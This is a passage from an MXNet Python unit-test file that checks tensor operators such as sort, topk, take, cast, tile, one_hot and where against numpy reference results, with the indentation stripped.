check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
